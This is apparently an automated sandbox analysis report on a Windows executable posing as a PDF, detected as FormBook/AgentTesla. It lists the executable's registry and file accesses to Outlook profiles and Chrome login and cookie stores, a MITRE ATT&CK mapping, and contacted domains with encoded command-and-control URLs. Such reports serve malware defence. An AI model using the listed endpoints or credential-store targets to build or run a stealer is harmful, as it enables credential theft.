Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation

Source: C:\Users\user\Desktop\AM PROJECT PDF.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\svchost.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Command and Scripting Interpreter	Path Interception	612 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	1 Input Capture	2 Process Discovery	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Archive Collected Data	Automated Exfiltration	4 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	612 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	1 Data from Local System	Scheduled Transfer	114 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	13 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	3 Obfuscated Files or Information	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	11 Software Packing	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
AM PROJECT PDF.exe	77%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
AM PROJECT PDF.exe	44%	Metadefender		Browse
AM PROJECT PDF.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
6.0.AM PROJECT PDF.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.fellyhub.com/plugin/pwa/images/icons/icon-72x72.png	0%	Avira URL Cloud	safe
http://www.soraligne.com/rdny/	0%	Avira URL Cloud	safe
http://www.fellyhub.com/js/html5.js	0%	Avira URL Cloud	safe
http://www.fellyhub.com/bbs/content.php?co_id=privacy	0%	Avira URL Cloud	safe
http://www.fellyhub.com/bbs/notice.php	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.fellyhub.com/js/common.js?ver=220620	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.fellyhub.com/bbs/qa.php	0%	Avira URL Cloud	safe
http://www.fellyhub.com/bbs/free.php	0%	Avira URL Cloud	safe
http://www.fellyhub.com/js/jquery-1.12.4.min.js?ver=220620	0%	Avira URL Cloud	safe
http://www.fellyhub.com	0%	Avira URL Cloud	safe
http://www.fellyhub.com/rdny/?7n-=6lYX&A0G=dZ8Ayr2drPdNVPVmuvzgGnZ5EDtn0CBwsWjIF75G8uy0K/UwgFE8TCCkfo+4feZhoJ7iWr04K24a/vrIrcJXcRwwE/YP1kXGBw==	0%	Avira URL Cloud	safe
www.texasfirsthonda.com/rdny/	0%	Avira URL Cloud	safe
http://www.fellyhub.com/bbs/board.php?bo_table=photo	0%	Avira URL Cloud	safe
http://www.fellyhub.com/bbs/content.php?co_id=company	0%	Avira URL Cloud	safe
http://www.fellyhub.com/theme/tailwind0.3/css/tailwind.min.css?ver=220620	0%	Avira URL Cloud	safe
http://www.fellyhub.com/js/placeholders.min.js?ver=220620	0%	Avira URL Cloud	safe
http://www.fellyhub.com/bbs/password_lost.php	0%	Avira URL Cloud	safe
http://www.fellyhub.com/theme/tailwind0.3/js/jquery.menu.js?ver=220620	0%	Avira URL Cloud	safe
http://www.fellyhub.com/theme/tailwind0.3/js/common.js?ver=220620	0%	Avira URL Cloud	safe
http://www.fellyhub.com/theme/tailwind0.3/js/sweetalert2.min.js?ver=220620	0%	Avira URL Cloud	safe
http://www.fellyhub.com/js/wrest.js?ver=220620	0%	Avira URL Cloud	safe
http://www.fellyhub.com/theme/tailwind0.3/js/swiper.min.css?ver=220620	0%	Avira URL Cloud	safe
http://www.fellyhub.com/js/jquery-migrate-1.4.1.min.js?ver=220620	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.fellyhub.com/bbs/login_check.php	0%	Avira URL Cloud	safe
http://www.fellyhub.com/theme/tailwind0.3/js/swiper.min.js?ver=220620	0%	Avira URL Cloud	safe
http://www.fellyhub.com/bbs/board.php?bo_table=photo&wr_id=2	0%	Avira URL Cloud	safe
http://www.soraligne.com/rdny/?A0G=nirRoMghSnbgIhB91EMNSfP7/7ht0QeVg0GeLwyPWvopBgzqt2G+p533L6eaW6GeyJy3z9ND4nEybKooy0llY69rAo//5MT1xA==&7n-=6lYX	0%	Avira URL Cloud	safe
http://www.fellyhub.com/bbs	0%	Avira URL Cloud	safe
http://www.fellyhub.com/bbs/board.php?bo_table=photo&wr_id=3	0%	Avira URL Cloud	safe
http://www.fellyhub.com/bbs/board.php?bo_table=photo&wr_id=5	0%	Avira URL Cloud	safe
http://www.fellyhub.com/bbs/board.php?bo_table=photo&wr_id=6	0%	Avira URL Cloud	safe
http://www.fellyhub.com/bbs/board.php?bo_table=photo&wr_id=1	0%	Avira URL Cloud	safe
http://www.fellyhub.com/bbs/gallery.php	0%	Avira URL Cloud	safe
http://www.fellyhub.com/bbs/board.php?bo_table=photo&wr_id=4	0%	Avira URL Cloud	safe
http://www.fellyhub.com/theme/tailwind0.3/css/dark.css?ver=220620	0%	Avira URL Cloud	safe
http://www.fellyhub.com/theme/tailwind0.3/skin/latest/pic_list/style.css?ver=220620	0%	Avira URL Cloud	safe
http://www.fellyhub.com/theme/tailwind0.3	0%	Avira URL Cloud	safe
http://www.fellyhub.com/bbs/register.php	0%	Avira URL Cloud	safe
http://www.fellyhub.com/theme/tailwind0.3/css/balloon.css?ver=220620	0%	Avira URL Cloud	safe
http://www.fellyhub.com/bbs/content.php?co_id=provision	0%	Avira URL Cloud	safe
http://www.fellyhub.com/theme/tailwind0.3/img/main_bn.jpg	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
fellyhub.com	162.241.194.111	true	true	unknown
soraligne.com	34.102.136.180	true	false	unknown
www.fellyhub.com	unknown	unknown	true	unknown
www.soraligne.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.soraligne.com/rdny/	false	Avira URL Cloud: safe	unknown
http://www.fellyhub.com/rdny/?7n-=6lYX&A0G=dZ8Ayr2drPdNVPVmuvzgGnZ5EDtn0CBwsWjIF75G8uy0K/UwgFE8TCCkfo+4feZhoJ7iWr04K24a/vrIrcJXcRwwE/YP1kXGBw==	true	Avira URL Cloud: safe	unknown
www.texasfirsthonda.com/rdny/	true	Avira URL Cloud: safe	low
http://www.soraligne.com/rdny/?A0G=nirRoMghSnbgIhB91EMNSfP7/7ht0QeVg0GeLwyPWvopBgzqt2G+p533L6eaW6GeyJy3z9ND4nEybKooy0llY69rAo//5MT1xA==&7n-=6lYX	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fellyhub.com/js/common.js?ver=220620	svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fellyhub.com/plugin/pwa/images/icons/icon-72x72.png	svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	svchost.exe, 00000012.00000003.502087892.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, 262I-Au.18.dr	false		high
http://www.fontbureau.com/designersG	AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fellyhub.com/bbs/notice.php	svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	262I-Au.18.dr	false		high
http://www.fellyhub.com/js/html5.js	svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/?	AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://vlovemeiwonv.cafe24.com/js/jquery-1.12.4.min.js?ver=191202	svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false		high
https://search.yahoo.com?fr=crmas_sfpf	svchost.exe, 00000012.00000003.502087892.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, 262I-Au.18.dr	false		high
http://www.tiro.com	AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fellyhub.com/bbs/content.php?co_id=privacy	svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.goodfont.co.kr	AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://use.fontawesome.com/releases/v5.3.1/css/all.css	svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fellyhub.com/bbs/free.php	svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fellyhub.com/js/jquery-1.12.4.min.js?ver=220620	svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fellyhub.com/bbs/qa.php	svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn/cThe	AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fellyhub.com	svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://vlovemeiwonv.cafe24.com/js/jquery-migrate-1.4.1.min.js?ver=191202	svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fellyhub.com/theme/tailwind0.3/css/tailwind.min.css?ver=220620	svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fonts.com	AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fellyhub.com/bbs/board.php?bo_table=photo	svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.deDPlease	AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fellyhub.com/js/placeholders.min.js?ver=220620	svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sakkal.com	AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fellyhub.com/bbs/content.php?co_id=company	svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fellyhub.com/theme/tailwind0.3/js/sweetalert2.min.js?ver=220620	svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fellyhub.com/bbs/password_lost.php	svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fellyhub.com/theme/tailwind0.3/js/jquery.menu.js?ver=220620	svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fellyhub.com/js/wrest.js?ver=220620	svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	svchost.exe, 00000012.00000003.502087892.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, 262I-Au.18.dr	false		high
http://www.fellyhub.com/theme/tailwind0.3/js/common.js?ver=220620	svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fellyhub.com/js/jquery-migrate-1.4.1.min.js?ver=220620	svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fellyhub.com/theme/tailwind0.3/js/swiper.min.css?ver=220620	svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	262I-Au.18.dr	false		high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	svchost.exe, 00000012.00000003.502087892.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, 262I-Au.18.dr	false		high
http://www.fellyhub.com/bbs/login_check.php	svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fellyhub.com/bbs/gallery.php	svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
